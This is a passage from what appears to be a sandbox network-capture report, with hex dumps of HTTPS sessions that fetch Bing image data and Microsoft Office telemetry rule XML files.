2024-11-23 06:09:27 UTC	8192	IN	Data Raw: 77 1a a9 63 76 66 ef 4b 1c 82 b3 7e d8 1d 7d e9 8d 74 17 f8 ab 3e 46 69 ed 11 ad 24 bd c5 41 24 f8 e7 75 66 bd fa f4 2d 55 a6 bc 3f de aa 8d 36 44 aa 23 42 6b ac 55 6b 8b 9a cc b8 bc ed bb e6 aa d2 4d 23 ed d8 dc 56 f1 a4 61 2a c8 dd 86 e4 37 de ea b5 2c 93 87 85 92 b9 f8 de 70 bc 54 d1 c9 27 7a 72 a5 d4 51 aa 25 f3 0f 39 bd 2a 9c 87 2d 56 26 5f 97 35 55 cf ad 6b 1d 88 63 58 d3 77 53 9c d5 79 0e 1a ad 2b 92 4f e6 7c d5 25 b3 9f b5 29 5e 95 4e dc 3c b7 0b 1a 75 6a bd 22 79 30 ec 8d 59 9b fb d4 a4 92 d0 22 db d4 ba f7 91 bc 9e 50 fe ef de ad 0d 36 cc 4d 66 a4 ff 00 15 60 58 5a dc 49 36 76 f3 fd ea ea 34 f2 61 b7 58 f6 fd dc 0a e6 ab 68 af 75 9d 14 ef 2d 5e c4 17 5a 19 59 b7 c6 db 83 7f 0d 52 58 b6 5c 79 47 e5 ae 9d 19 fc be 7a 56 74 f6 b1 3c cc ef f2 d6 51 Data Ascii: wcvfK~}t>Fi$A$uf-U?6D#BkUkM#Va7,pT'zrQ%9-V&_5UkcXwSy+O\|%)^N<uj"y0Y"P6Mf`XZI6v4aXhu-^ZYRX\yGzVt<Q
2024-11-23 06:09:27 UTC	8192	IN	Data Raw: d6 f4 1f 2e c3 52 69 35 7d 2b 76 15 65 93 f7 d0 8f fa 66 c7 93 fe e9 e3 e9 5d 4e b7 f0 27 c3 12 db c6 6c 35 56 59 1a 40 59 ae 74 5b 49 1b 60 ec bb 11 40 3e e4 35 66 5c 7c 09 f0 fd a4 2b 23 eb 56 d1 8f 33 e6 92 4d 25 37 e0 8c 6d 5d 8c a3 93 d4 91 5a e1 f3 5a 54 9f 34 24 d3 f4 22 b6 05 d5 5c b3 b3 47 b5 e8 7e 22 d1 b5 fb 3f 37 4c 9d bc c5 50 64 82 55 31 cd 0e 47 1b 90 f3 cf af 43 5a 11 97 3d 1f 6d 72 bf 0a 7e 1d 68 7e 0d d3 d9 ec db ed 97 97 2a a6 5b c9 14 ef 60 06 02 a8 66 62 8b 8e d9 ae c3 ca 75 af ba a1 39 4a 94 5c d5 9b 3e 46 bc 61 1a b2 54 dd d2 27 b5 41 e5 b0 2d c5 36 6b 60 79 0d 49 19 70 b8 fb b4 e5 2e 29 ea 98 95 9a 20 78 09 e5 ff 00 ef 9a 6f 97 1a ae 76 d5 89 32 78 a6 b2 9d bf de a7 76 4d 91 04 32 a4 6b 81 4e 77 32 d3 26 8c fc d8 5a 8a 13 26 ed 9d Data Ascii: .Ri5}+vef]N'l5VY@Yt[I`@>5f\\|+#V3M%7m]ZZT4$"\G~"?7LPdU1GCZ=mr~h~*[`fbu9J\>FaT'A-6k`yIp.) xov2xvM2kNw2&Z&
2024-11-23 06:09:27 UTC	8192	IN	Data Raw: d7 46 f1 25 d6 b7 7b ad 5d ea fa a5 cc 6b 02 de 5e c7 17 99 6f 12 e4 84 8c a2 8f 97 e6 ef d4 d3 74 af 0d c5 a7 6a 9a ae b6 9a ad cd d6 b3 ab c4 23 7d 52 fa 08 e4 9a 38 c0 c2 a8 54 55 1b 47 5c 56 b4 f1 12 8a b7 c9 7f 99 0e 34 ef 7b 79 fc cf 95 7c 51 61 f1 2f c6 1f 1c a4 f0 d7 83 fc 5f 6d 6c 16 08 c2 c9 a1 6a 92 b6 9f c2 17 dc 59 c1 21 b1 c1 18 ea 2b d8 fc 3b f0 cb c4 1e 17 d1 e3 b7 d5 3c 75 77 e2 4d 7a e5 71 24 77 77 ab 0d bd a8 ee ca 81 4b bf d4 fe 95 e8 1e 00 f0 ad 9f 87 75 2d 43 54 96 58 35 0d 67 57 9f cf bd bf 8a db ec cb 20 18 d8 be 5a 92 00 5c 7e 35 2c d0 ce 75 29 ee 6f e5 b6 b9 bb 69 0e d9 e3 b4 11 b2 c7 9c aa 71 92 70 3b 93 cd 7a f9 66 1a 59 8e 27 d9 b7 68 2d 74 b6 df f0 4f 33 32 c5 ac 16 1f 9e 2a f2 7a 7c f7 22 b5 88 c5 67 14 4e db 8a 46 a8 cd fd Data Ascii: F%{]k^otj#}R8TUG\V4{y\|Qa/_mljY!+;<uwMzq$wwKu-CTX5gW Z\~5,u)oiqp;zfY'h-tO32*z\|"gNF
2024-11-23 06:09:27 UTC	8192	IN	Data Raw: 12 61 25 14 e4 9a 7e 8c e8 ab 90 62 63 27 c9 66 bd 4b 6b 65 7a ed b3 6b 65 aa fc 3a 0e a0 eb c7 5f ee d6 5d c7 c4 5b 8b 79 36 7d 87 49 9e 58 d4 bb 47 1c f2 6d e3 9f bc 06 3a 7a 74 a9 e3 f8 b5 35 8c 8b 21 f0 f5 96 e9 3e 48 ff 00 d2 64 db 9e f9 f9 38 ab 97 10 61 2d bf e0 ff 00 c8 50 c8 71 4d ea b4 f5 46 c5 b7 85 75 86 5d e6 2d a3 fd ea b4 9e 14 d4 76 e4 ca bf f0 1a cb 5f 8c 77 7e 5e 64 f0 f5 8a ee 6f 95 5a e6 4f 97 f1 db 49 71 f1 9d a3 99 a3 93 43 b4 c2 fd d6 8e ed db 9f 4f bb 5c ff 00 eb 05 16 fe 2f c1 ff 00 91 d5 fd 87 51 7d 9f c5 1b 57 1e 11 d5 23 8d 64 1f bc dd fc 2b 4e b0 f0 e5 e3 c3 23 fd d9 15 bf 89 6b 3e 3f 8d 31 db c6 bb f4 8b 69 1b fe 79 fd ac ab af e6 b5 51 3e 39 d9 dc de 7d 9e 2d 06 36 95 97 2a ab 7f f7 be 99 4e b8 e6 97 f6 f5 2e b2 fc 1f f9 07 Data Ascii: a%~bc'fKkezke:_][y6}IXGm:zt5!>Hd8a-PqMFu]-v_w~^doZOIqCO\/Q}W#d+N#k>?1iyQ>9}-6*N.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	49759	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:26 UTC	346	OUT	GET /th?id=OADD2.10239370639606_1UY6VCV79VNDR5KH5&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-23 06:09:27 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 612524 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 9029B05CFFD9476B81B43AF73A4E71FF Ref B: EWR30EDGE1108 Ref C: 2024-11-23T06:09:26Z Date: Sat, 23 Nov 2024 06:09:26 GMT Connection: close
2024-11-23 06:09:27 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 19 c4 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 31 3a 32 31 20 31 36 3a 31 39 3a 33 36 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 25.1 (Windows)2023:11:21 16:19:368
2024-11-23 06:09:27 UTC	16384	IN	Data Raw: f4 d9 2d b4 98 20 9d 76 b4 6b 86 ad b8 2c 53 6e 7f bd 56 12 dc 06 af 3b 11 8f 95 64 93 d1 1e ae 17 03 4f 0f 77 1d d9 02 5a 8d bc 52 49 69 9f ad 5d 58 f1 fc 34 e6 84 fd fe f5 c1 ed 19 d7 ca 65 3d a6 3f 86 ab 5c e9 b0 49 f7 e0 dd b7 fb cb 5b fe 58 3c f7 a8 e4 8f 0b cd 54 6a be 84 ba 69 1c dd ce 95 6c df 7e d9 7e 5f f6 6a bd f6 85 67 3d bb 66 25 c3 2d 74 37 0a 87 a7 cd 54 ee 3e 45 f6 ae 98 56 9d d6 a6 33 8a 69 a6 b4 3c 8f 5c b0 7d 3b 52 92 d8 fd d5 fb bf 4a aa 17 1c d7 41 e3 44 9e 6d 51 9c 44 db 63 e3 75 61 e0 86 c1 f9 4f fb 55 f4 54 aa 73 41 37 b9 f2 75 a9 28 d4 69 2d 08 b6 9a 5d b5 6b 4f b5 7b bb a5 89 3a b5 74 96 be 13 cb 29 66 dc 29 54 af 0a 7f 13 34 a3 83 ab 55 5e 2b 43 90 db fe c5 39 41 3c 05 dd 5e 86 9e 1c b3 5b 7d 9e 52 e7 fb d4 26 85 6f 13 71 12 fc Data Ascii: - vk,SnV;dOwZRIi]X4e=?\I[X<Tjil~~_jg=f%-t7T>EV3i<\};RJADmQDcuaOUTsA7u(i-]kO{:t)f)T4U^+C9A<^[}R&oq
2024-11-23 06:09:27 UTC	16384	IN	Data Raw: 7b 35 47 72 e2 a2 77 34 c7 6d d1 e4 d3 b0 9b 23 99 ce ee 6a 1d f8 a4 b8 6e f5 59 e5 ad 63 13 26 ec 4f 23 e5 6a ac 8f de 9e 92 67 8a 6c cb 9a b4 91 2c a5 32 fd e3 55 e4 1f 35 5e ba c2 ae 2a 9c c3 1d 2b 58 ea 67 22 07 27 6f 15 0b 65 9b 9e 95 2b 0c d3 15 71 5a 23 36 3a 1e 7e b5 2a 81 d3 bd 47 c2 d2 ab f7 0d ba 90 d6 85 88 db 1c 54 88 d8 aa 68 fb 79 a9 16 40 29 34 52 68 b5 95 ab 10 c8 3c b6 15 9e b2 76 ed 53 a4 9e bd 6a 1a 1d d1 75 65 c7 f1 d3 92 53 54 7c df 7a 96 39 81 e7 75 4d 98 d4 8b 6b 21 ed 4e 67 90 2e 6a bc 72 62 4a b4 ac ae b8 35 0f 43 44 d3 22 de 4f de a5 5d df 36 29 2e 19 23 e9 50 b5 c8 14 12 dd 89 d1 87 f1 7f 15 39 08 eb ba a8 34 c6 9d 1c c4 7d 69 f2 b0 e6 2d 39 1b aa 09 9b b5 47 35 c0 35 0b 5c 67 a7 f0 d5 46 2c 57 40 e7 14 8b 29 dd 4c df 96 cf 7a Data Ascii: {5Grw4m#jnYc&O#jgl,2U5^+Xg"'oe+qZ#6:~GThy@)4Rh<vSjueST\|z9uMk!Ng.jrbJ5CD"O]6).#P94}i-9G55\gF,W@)Lz
2024-11-23 06:09:27 UTC	16384	IN	Data Raw: b6 91 a1 25 e6 7a 54 6f 73 bb ad 50 f9 a9 39 fb b5 6a 9a 25 d4 93 2c bc c4 36 29 16 e0 af 23 ad 56 62 7a 53 76 92 d5 5c a8 5c cc b5 24 e5 a9 9e 79 dd ef 50 b2 b9 a4 db 21 a3 95 0a ec 95 a5 27 a5 27 99 51 6c 71 cf cd 48 ca 68 b0 b5 24 69 7e 6c 9a 6b 3d 33 63 fe 34 be 4b 95 a6 20 69 3f bd 48 d2 0d b9 ff 00 d0 68 f2 1e 9b f6 79 3b 6e a6 2d 43 cc c5 2f 9d 85 a6 79 12 0e 4a d1 e5 3e de 68 d0 35 1f e7 93 47 9c 6a 3f 2c ee a7 79 47 77 34 83 51 7c d6 a1 a6 cf 06 8f 2a 8f 2b 3d 16 98 6a 1b fb 52 ac 94 e4 84 9f ef 54 a9 6e 4e df 96 90 6a 41 e6 7a d2 b3 9f f7 6a e2 5a 65 b8 a4 6b 27 db 90 94 5d 0f 95 95 77 d2 ef cf 15 37 d8 a4 fe ef 14 9f 65 71 c6 da 2e 85 66 45 ba 9e 8c 7a 54 89 6a fd 2a c4 36 44 b5 26 35 16 c8 13 9e bd 2a 68 c9 1d 2a da 59 a6 d5 15 3a 69 cd e5 e4 Data Ascii: %zTosP9j%,6)#VbzSv\\$yP!''QlqHh$i~lk=3c4K i?Hhy;n-C/yJ>h5Gj?,yGw4Q\|+=jRTnNjAzjZek']w7eq.fEzTj6D&5hY:i
2024-11-23 06:09:27 UTC	16384	IN	Data Raw: 51 87 7a 29 56 29 3b ad 15 57 43 57 3c ee 3d 3c af c8 56 a6 4d 3d fb 7c d5 bc f1 80 cc 45 48 91 21 ae e7 58 e2 58 7b b3 9e 6b 27 f9 bf 74 d4 cb 8b 02 b6 ec fb 76 9a eb ed ed 23 f2 f2 7a 53 5e d6 17 99 45 47 d6 0b fa ab ee 70 72 24 89 c7 cc b4 c6 63 de bd 1a 1d 22 d2 49 18 95 56 f9 6a a5 e7 87 ed 9e 65 8d 22 55 1d 69 ac 54 2f 6b 12 f0 73 4b 46 70 de 6f cb 4f 47 3f dd ae fd fc 21 64 63 52 3a d4 2b e1 7b 68 be e3 35 0b 17 4d 8d e0 ea a3 8b 57 7f ee b5 2f 98 e1 79 ae ae 6d 2c 45 e6 79 7f 36 da 5d 2f 4d 12 49 be 45 da b5 5e da 36 b9 1f 57 9d ec 72 5e 6b 1e 36 d1 e6 1d d8 d9 5d 9e a1 a5 5b 15 ca 46 b5 5a 3d 3a d9 5b 7f 95 ca d1 1a d1 6a f6 14 a8 ce 2c e5 37 12 df 77 8a 55 86 47 5e 15 ab b0 fb 14 01 bf d5 2b 53 d6 de 21 c0 55 a7 ed 51 9f 2b 38 f6 d3 ae 4f fc b3 Data Ascii: Qz)V);WCW<=<VM=\|EH!XX{k'tv#zS^EGpr$c"IVje"UiT/ksKFpoOG?!dcR:+{h5MW/ym,Ey6]/MIE^6Wr^k6][FZ=:[j,7wUG^+S!UQ+8O
2024-11-23 06:09:27 UTC	16384	IN	Data Raw: 0e 46 6b e6 ff 00 2a e1 57 fd 6c ab ff 00 02 34 f5 9f 53 f9 71 a8 5d ff 00 b3 fb f7 ff 00 1a 39 96 f7 d0 4d be c7 b7 dc 69 9a 8b ea 56 d1 c5 6d bb cb bb 94 fc ac 3e 51 d8 fe 55 d5 7c 39 d2 b5 1b 7f 18 69 97 72 ae db 7b 39 26 49 19 98 2e dd e0 e3 f0 af 9e f4 4d 46 5b 38 64 92 ef 53 d4 a3 92 46 1b 55 59 f6 ff 00 df 59 aa 97 1a d6 bb 23 6c fe d7 be 68 f7 65 57 cc 2d f4 ab e7 84 af 7b 85 de 88 fa fb c1 3a 6e a1 7b e3 2d 42 e2 58 bc bb 69 22 57 89 9b fe 5a 05 73 9c 7a d7 2f 6b a3 eb ab ad 5b 4e 90 49 24 70 5d cb 37 ca a5 b6 83 21 c6 6b c1 7c 31 e2 6b cb 4b a8 9f 57 f1 0e ad 04 6b 21 f3 23 b4 62 8f b3 1d bb 1e 69 66 f8 97 e3 99 21 6b 78 f5 ab 95 8b a2 b4 79 47 60 0f cb b8 a9 e4 d2 b4 5b bd ec 35 78 c5 2b 1e cf f1 32 d2 f1 e1 d1 5d ec e5 5d d7 71 c8 df ec 81 d7 Data Ascii: Fk*Wl4Sq]9MiVm>QU\|9ir{9&I.MF[8dSFUYY#lheW-{:n{-BXi"WZsz/k[NI$p]7!k\|1kKWk!#bif!kxyG`[5x+2]]q
2024-11-23 06:09:27 UTC	16384	IN	Data Raw: 95 a4 93 b3 01 e8 7a d7 44 21 a3 5b b3 39 68 fb 12 eb 96 f6 da 4e a1 04 76 57 9e 64 b1 4b e7 c5 27 f1 48 08 07 e6 3d 8f 06 b6 34 a3 e2 8f 11 c3 78 2d ef 2d 16 26 6f 32 49 6e 72 db 9f ae d0 47 46 fa d6 44 76 11 de de 39 92 fb 75 bc 16 91 f9 77 2b 1f ca c7 1c 93 e9 83 5d 17 87 e5 d2 34 f8 6c f4 7b 6d 63 cd f3 67 12 4a d1 46 7e 69 08 c6 37 7a 62 b4 a7 7d 35 22 76 5d 0f 4e d2 6e 74 eb 7b 3b 1d 3a 59 f7 5d f9 0b f2 b2 95 dc 40 f9 88 ad 04 78 17 f8 57 fd aa e4 fe 1b 9b 6f 18 c9 17 8a e2 fd d5 be 99 77 75 67 69 1c 79 65 b8 c7 c8 ec d9 e9 86 1c 57 72 b6 f1 2f f0 d7 e8 38 1a b5 25 41 39 ab 76 f4 3e 2f 17 49 46 b4 94 19 51 ae 23 0b c7 4a 85 ee 80 ab ef 04 72 49 fd dd b4 d9 ac 61 2b f7 76 d7 5a 94 4e 57 09 b3 3d af 31 d2 95 6f 10 fd f5 6a 95 ad 46 ea 89 a1 0a d8 db Data Ascii: zD![9hNvWdK'H=4x--&o2InrGFDv9uw+]4l{mcgJF~i7zb}5"v]Nnt{;:Y]@xWowugiyeWr/8%A9v>/IFQ#JrIa+vZNW=1ojF
2024-11-23 06:09:27 UTC	16065	IN	Data Raw: 9b 8e a4 e2 92 4b 41 1c 32 47 03 33 2e df ee ed 65 23 a8 aa b7 10 20 85 6e 64 fb 4b 49 12 fe ef cb 8f 6a a8 3e e2 a5 ca ec 51 5a 92 eb 96 d2 db dc 79 69 b5 ae 22 52 5b 6f cd b8 9e 40 f7 ac ed 54 59 5b 6b 1f e8 13 ac a2 4b 60 7e 65 1b 56 42 3e 65 1d b1 42 de 5f c5 6f 3d d4 53 b4 93 45 24 6e ad 27 cc aa 33 8c 7d 6a 7d 4a 24 ba 68 e5 75 58 8e e0 7f 77 85 dd 57 16 9a d3 60 69 1e 63 e2 69 24 93 c4 4b 6e 1b f7 8d 26 ff 00 bb f7 70 3a 56 cf 89 e3 8f ed 56 db e0 56 13 c1 19 6f 97 6e d3 d3 1f 98 cd 49 e3 2d 30 58 78 9a 42 19 65 5b 98 01 9f 72 fc ec e4 9f 96 b3 a1 d3 fc 8b a5 f2 b6 f9 77 5c 34 72 b3 b6 dc fe 06 bb 25 26 f5 b9 ce 96 e8 9f ec 9a 75 af 86 ee 8d bc 1f bd 8e 45 46 7f 2c ae e7 6c 9d dd 4e 30 a3 a5 72 5e 20 b7 92 e1 56 48 a7 91 a6 66 c4 9e 64 9b 96 40 3d Data Ascii: KA2G3.e# ndKIj>QZyi"R[o@TY[kK`~eVB>eB_o=SE$n'3}j}J$huXwW`ici$Kn&p:VVVonI-0XxBe[rw\4r%&uEF,lN0r^ VHfd@=
2024-11-23 06:09:27 UTC	16384	IN	Data Raw: c5 61 6f f6 69 23 8b 01 65 59 37 3a c8 7f bc 4f 6a cf d0 ef b5 7b 0b ed 42 7d 51 7c a5 f2 8f 95 1c 8c 36 c9 8e ca be 9b a9 de 3e b8 f3 b5 45 80 ed b7 6b 49 cb cb 3a af ca d8 c0 c8 ce 73 59 7a 7d e4 fa 85 f3 46 97 3f 69 8b fd 5c 6d 24 61 a6 62 79 07 ff 00 d5 5b c5 7b bb 0e c5 a8 58 4d ab 2d e6 a0 df 6a 5d a2 35 8e 5c 6d 84 9e 72 17 f8 45 7a 5f 84 33 67 e0 d8 f7 ea 6a d7 32 37 ef 16 08 36 c7 b0 74 ce 3a 8a f2 cf 12 48 96 97 51 cb 35 f4 11 cc d1 ec 68 15 4e e5 1d b3 ee 6b d2 d7 49 8d fc 27 15 dd 84 f0 4f 35 d4 6b ba e6 35 da ac 3a f1 9f a5 0e e1 a6 85 3d 2f 4d bb b1 d7 27 fb 06 8b 69 2d c4 8d e7 4b 2c 6d bf e4 3d 95 88 1b 6b ad 8c 41 77 a3 c7 1d 97 99 15 aa a9 92 55 91 4f ef 09 fe f7 ae 2b 21 2f a4 81 67 bf 2e df ea 82 49 1a c7 b5 18 0f ee fb d6 bd 84 85 f4 Data Ascii: aoi#eY7:Oj{B}Q\|6>EkI:sYz}F?i\m$aby[{XM-j]5\mrEz_3gj276t:HQ5hNkI'O5k5:=/M'i-K,m=kAwUO+!/g.I
2024-11-23 06:09:27 UTC	16384	IN	Data Raw: d2 fd 9a 49 60 b9 5f 32 36 56 75 55 19 fe 2c 73 f8 1a 85 74 e8 e3 b8 93 cf b1 8f 6a b0 f2 f6 e1 95 7d 73 81 fa d4 be 20 1a af 93 05 86 8f 3c 71 45 24 65 d5 99 87 cc 7d 0f b0 aa bd dd 90 b6 47 9b f8 9b c5 32 8d 4a 4b 0d 57 41 82 5d b3 e6 da 35 91 d5 76 0e 8c 54 1c 31 22 bb 2f f8 49 ec 2c bc 3f 6b 73 2d 9d dc 11 b7 0a b1 30 f9 46 3a 30 e3 22 b2 34 8b 2f 12 c9 70 b7 17 16 cd 98 24 22 4b 96 64 74 6f 5e 36 e7 1f 43 56 b5 0d 37 5d 96 f3 c8 b3 97 ed 92 b4 81 f6 c9 6d 1b 5b c2 9d 87 3f c5 5a d4 97 be bc 82 2b dd b3 2d a6 b3 a2 6b 16 b2 59 47 05 ce 6e 9b 0a db 86 ec ff 00 b5 db 8a e8 3c 43 a2 dc 5a 78 7e db 31 41 1d bf cb 1a af 94 19 fa 60 6d 03 8a ab e1 7d 3b 51 92 69 6d b5 3b 1b 48 04 8c 0a ed 51 1e dc 7b af ad 6a 6b 1a 6c f1 d8 f9 96 73 f9 12 c7 26 7f 77 21 77 Data Ascii: I`_26VuU,stj}s <qE$e}G2JKWA]5vT1"/I,?ks-0F:0"4/p$"Kdto^6CV7]m[?Z+-kYGn<CZx~1A`m};Qim;HQ{jkls&w!w

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.6	49761	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:27 UTC	192	OUT	GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:28 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:27 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA701121" x-ms-request-id: 63e0f5a8-701e-0032-207a-3ba540000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060927Z-174c587ffdf8fcgwhC1TEBnn7000000002hg00000000tmkh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:28 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.6	49762	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:27 UTC	192	OUT	GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:28 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:27 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA41997E3" x-ms-request-id: b82db7f7-b01e-0053-188c-3acdf8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060927Z-174c587ffdfldtt2hC1TEBwv9c000000027g00000000r2vk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-23 06:09:28 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.6	49763	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:27 UTC	192	OUT	GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:28 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:27 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8CEAC16" x-ms-request-id: 44207c53-001e-0079-37ad-3b12e8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060927Z-15b8b599d885ffrhhC1TEBtuv000000002fg00000000ku72 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:28 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" 